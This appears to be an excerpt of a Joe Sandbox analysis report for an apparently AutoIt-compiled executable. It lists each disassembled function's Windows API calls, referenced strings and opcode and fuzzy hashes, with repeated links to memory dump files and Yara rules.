Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 38f35b5fbea113b0ba1757f5fdf172e2d973f2866129d2109a9ad9f4a6fc8482
Instruction ID: 73b6216bf9cbc028c6b78d0a828bc110b3cfb2b6b7624ec6ab7391b35462f7bc
Opcode Fuzzy Hash: 38f35b5fbea113b0ba1757f5fdf172e2d973f2866129d2109a9ad9f4a6fc8482
Instruction Fuzzy Hash: A1110679901218BFEB11DBA5C985EADBBB8EB48710F2040A5EA00B7290DA716E11DB94

Function 00AA1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DefDlgProcW.USER32(?,00000020,?), ref: 00AA12D8
GetClientRect.USER32(?,?), ref: 00ADB5FB
GetCursorPos.USER32(?), ref: 00ADB605
ScreenToClient.USER32(?,?), ref: 00ADB610

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: dad8fd20b73c92ca9b203640a3c0f1bc0f73f2dabbbb00ec31d502d5b781a90b
Instruction ID: 21b2323b11111c5dd992dca40807f21b4485fb454fce39d4111b4cc591340968
Opcode Fuzzy Hash: dad8fd20b73c92ca9b203640a3c0f1bc0f73f2dabbbb00ec31d502d5b781a90b
Instruction Fuzzy Hash: 4F11F83950011AFBCB11DF98D985AFE77B8EB06301F500466F941E7291CB34AA56CBA5

Function 00B01142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AFFCED,?,00B00D40,?,00008000), ref: 00B0115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AFFCED,?,00B00D40,?,00008000), ref: 00B01184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AFFCED,?,00B00D40,?,00008000), ref: 00B0118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00AFFCED,?,00B00D40,?,00008000), ref: 00B011C1

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d27373847a4e8831605f7cc8c287186e7978d8221b8c3492888a15d6e371d892
Instruction ID: af97baf8174fe7a2b04f73201a1879aa321f883fbe03e0c7317d61b346a36d01
Opcode Fuzzy Hash: d27373847a4e8831605f7cc8c287186e7978d8221b8c3492888a15d6e371d892
Instruction Fuzzy Hash: BA117031C0051DD7CF089FA9D884AEEBFB8FF09751F404495EA40B2280CB305561CB91

Function 00AFD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00AFD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AFD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AFD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00AFD897

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: fab1a527d668eeb7bddc5a708d7bc92f0b450160b794d1a2614037b1558df137
Instruction ID: 180cb2e18db58a0e25d8b252b52c055c5750f94c7db3b082a695772b60e32ef9
Opcode Fuzzy Hash: fab1a527d668eeb7bddc5a708d7bc92f0b450160b794d1a2614037b1558df137
Instruction Fuzzy Hash: 67115E75605309EBE3219F90DC08FA6BBBDEB00B40F108569B656D7150D7B0E5499BE1

Function 00AD6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00AD6FDB

Part of subcall function 00AD76C2: __fltout2.LIBCMT ref: 00AD76EB

__cftog_l.LIBCMT ref: 00AD7001
__cftoe_l.LIBCMT ref: 00AD7033

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 1fa5680e174c3a20b173b1120409902eb39836c412b7bfcf3a5b89012f1fb860
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 4D01407244414ABBCF1A5F84DC01CED3F62BB18350F588456FE1A58271E636C9B1AB81

Function 00B2B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B2B2E4
ScreenToClient.USER32(?,?), ref: 00B2B2FC
ScreenToClient.USER32(?,?), ref: 00B2B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2B33B

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: f553507cfa63363f4b0c314580f83870c27647b1a600db8195804708ac89e7fa
Instruction ID: b717de28686e91622f9778fc01e5f9aef4e67086d3ac3aca7614208a705e1623
Opcode Fuzzy Hash: f553507cfa63363f4b0c314580f83870c27647b1a600db8195804708ac89e7fa
Instruction Fuzzy Hash: B6114675D0020AEFDB51CF99D4449EEBBF5FB08310F104166E914E3620D735AA55CF50

Function 00B2B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B2B644
_memset.LIBCMT ref: 00B2B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B66F20,00B66F64), ref: 00B2B682
CloseHandle.KERNEL32 ref: 00B2B694

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: c25e0b0eef7377004ac3d05924f572287033cc840fbe8f64e4ec1f31c7b6c750
Instruction ID: 3191eefd889314f3fbefe64605ec68656708f7ab9117cc7fd250ab5edb99109f
Opcode Fuzzy Hash: c25e0b0eef7377004ac3d05924f572287033cc840fbe8f64e4ec1f31c7b6c750
Instruction Fuzzy Hash: F5F05EB25403007AF2116761BC16FBB7B9CEB18395F004030FA09E6192DFBA4C0087A8

Function 00B06BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00B06BE6

Part of subcall function 00B076C4: _memset.LIBCMT ref: 00B076F9

_memmove.LIBCMT ref: 00B06C09
_memset.LIBCMT ref: 00B06C16
LeaveCriticalSection.KERNEL32(?), ref: 00B06C26

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 63898c8cf47d654b213784fb09009205cdaf6a18e401e1fdda09f81c2ed597c5
Instruction ID: 077df3f4c17fa3423209d614298b4029b73a69cdfe2b260106ae73928217cc89
Opcode Fuzzy Hash: 63898c8cf47d654b213784fb09009205cdaf6a18e401e1fdda09f81c2ed597c5
Instruction Fuzzy Hash: 76F0F47A100100ABCF116F95DC85E5ABF69EF49361F0480A5FE095F267DB31E911DBB4

Function 00AA2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00AA2231
SetTextColor.GDI32(?,000000FF), ref: 00AA223B
SetBkMode.GDI32(?,00000001), ref: 00AA2250
GetStockObject.GDI32(00000005), ref: 00AA2258
GetWindowDC.USER32(?,00000000), ref: 00ADBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00ADBE90
GetPixel.GDI32(00000000,?,00000000), ref: 00ADBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00ADBEC2
GetPixel.GDI32(00000000,?,?), ref: 00ADBEE2
ReleaseDC.USER32(?,00000000), ref: 00ADBEED

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: b72799de7045ce797f58c4ebe665869e927a17d540214c72c0b7bfe2d60f7e03
Instruction ID: 481e314966df7f98491b97b52352ae029e53e03842e691387537ee1c85836c3c
Opcode Fuzzy Hash: b72799de7045ce797f58c4ebe665869e927a17d540214c72c0b7bfe2d60f7e03
Instruction Fuzzy Hash: 90E06D32104245EADF315F68FC0DBE83F20EB15332F008376FA69990E18B7189A1DB22

Function 00AF8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00AF871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00AF82E6), ref: 00AF8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AF82E6), ref: 00AF872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00AF82E6), ref: 00AF8736

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 1af1eb3a6a26d5ee36d3c3c13a20b636784bec647339f5ded2e4c5d55353eca5
Instruction ID: e782d29e60199a4d03b085c0b01a71176b34a6561b8e39d127d32b31b30a150f
Opcode Fuzzy Hash: 1af1eb3a6a26d5ee36d3c3c13a20b636784bec647339f5ded2e4c5d55353eca5
Instruction Fuzzy Hash: 9AE04F36611212DBD7306FF05D0CB673BB8EF55B91F144838B245CA040DE2884428755

Function 00AC5DAC Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00AC5DAD

Part of subcall function 00AC99C4: GetLastError.KERNEL32(00000000,00AC0DD3,00AC8B2D,00AC57A3,?,?,00AC0DD3,?), ref: 00AC99C6
Part of subcall function 00AC99C4: __calloc_crt.LIBCMT ref: 00AC99E7
Part of subcall function 00AC99C4: __initptd.LIBCMT ref: 00AC9A09
Part of subcall function 00AC99C4: GetCurrentThreadId.KERNEL32 ref: 00AC9A10
Part of subcall function 00AC99C4: SetLastError.KERNEL32(00000000,00AC0DD3,?), ref: 00AC9A28

CloseHandle.KERNEL32(?,?,00AC5D8C), ref: 00AC5DC1
__freeptd.LIBCMT ref: 00AC5DC8
ExitThread.KERNEL32 ref: 00AC5DD0

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
String ID:
API String ID: 4169687693-0
Opcode ID: 41a8717e80a40dc2294adee0ae0757fc85fa0386e1e5e289a3e16652fab8230c
Instruction ID: 853ef53385b32c4ebe0550d5840acf0231fcd66c5b638084bd66008b2075830f
Opcode Fuzzy Hash: 41a8717e80a40dc2294adee0ae0757fc85fa0386e1e5e289a3e16652fab8230c
Instruction Fuzzy Hash: 82D0C731401F1297C733A7749D0DF3A77609F01B61B16462CF466565F09F3478438655

Function 00AFB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00AFB4BE

Strings

Container, xrefs: 00AFB43B
AutoIt3GUI, xrefs: 00AFB436

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 984a8223c71029a9db738fe32fe11bdaa70a0c26275d7e4db9701d612825d196
Instruction ID: 619488eba9d0353282feabe06a61c44e452605e2285d19ac97a94de6fe6c6514
Opcode Fuzzy Hash: 984a8223c71029a9db738fe32fe11bdaa70a0c26275d7e4db9701d612825d196
Instruction Fuzzy Hash: 4C915C752106059FDB14DF68C884B6AB7F9FF48711F2085ADFA46CB6A1DB70E841CB60

Function 00B0AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00ABFC86: _wcscpy.LIBCMT ref: 00ABFCA9

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

__wcsnicmp.LIBCMT ref: 00B0B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B0B0F6

Strings

LPT, xrefs: 00B0B027

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 179e7943f796360f846d7115889b80c8469784ade62b76b7399043b7518504d7
Instruction ID: 8d2f85570e3fadbd5c9d4a14a48f97b4a8cbe7695a11255851b629da8b4bbd20
Opcode Fuzzy Hash: 179e7943f796360f846d7115889b80c8469784ade62b76b7399043b7518504d7
Instruction Fuzzy Hash: F8619175A10219AFCB14DF94D991EAFBBF8EF09310F1040A9F916BB291DB30AE40CB50

Function 00AB2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00AB2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00AB2981

Strings

@, xrefs: 00AB2975

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 0c325c1bce8ccec5031b707e80cb4ea98efe943bfa825100f0e98ea0dbe5fb66
Instruction ID: 9e4c52fe9f923ddc9b550424d50e4e7d633f0487a60aab3a5a4b4ea8ab4d786e
Opcode Fuzzy Hash: 0c325c1bce8ccec5031b707e80cb4ea98efe943bfa825100f0e98ea0dbe5fb66
Instruction Fuzzy Hash: 76513972418744ABE320EF10D986BAFBBE8FF86344F41885DF2D8421A1DF358529CB56

Function 00B09734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00AA4F0B: __fread_nolock.LIBCMT ref: 00AA4F29

_wcscmp.LIBCMT ref: 00B09824
_wcscmp.LIBCMT ref: 00B09837

Strings

FILE, xrefs: 00B09770

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: c1ae8d3a5380539bd53a0d236959461c43936659b713057590b44f4d7f09b329
Instruction ID: 3b07097a130c39dccf1c1be51b7064a7b0e692fefef7b64c9db5c855e978cdf3
Opcode Fuzzy Hash: c1ae8d3a5380539bd53a0d236959461c43936659b713057590b44f4d7f09b329
Instruction Fuzzy Hash: 46417571A00219BADF219AA4CC46FEFBBF9DF8A710F0144A9F904B71C1DBB199058B61

Function 00B1258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B1259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B125D4

Strings

|, xrefs: 00B125A5

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: b8967a48d849e27395dfd756eafd88e6c0f0ff269fa4fa029f193d0bb1670a36
Instruction ID: 765adf3660b43e3bb9216e9d01d2c1ea5cccdeecf2c0ff0df9f883f6e0da2b7f
Opcode Fuzzy Hash: b8967a48d849e27395dfd756eafd88e6c0f0ff269fa4fa029f193d0bb1670a36
Instruction Fuzzy Hash: B7310671800219EBCF11EFA0CD85EEEBFB9FF09350F100069F915A61A2EB315956DB60

Function 00B27A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00B27B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B27B76

Strings

', xrefs: 00B27ACA

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 0c4cf2c26fcd8466f2c0a7879ca6b5613ceb1b86012ceabe82627c5572494872
Instruction ID: 531d4029a42916beb7effdc4e502cb937d30371d9bfb734e5b8eae5c3b10682a
Opcode Fuzzy Hash: 0c4cf2c26fcd8466f2c0a7879ca6b5613ceb1b86012ceabe82627c5572494872
Instruction Fuzzy Hash: A5413974A4521A9FDB14CF64D990BEABBF5FF09310F1001AAE908EB391DB70A951CF94

Function 00B26A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00B26B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B26B53

Strings

static, xrefs: 00B26AB3

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
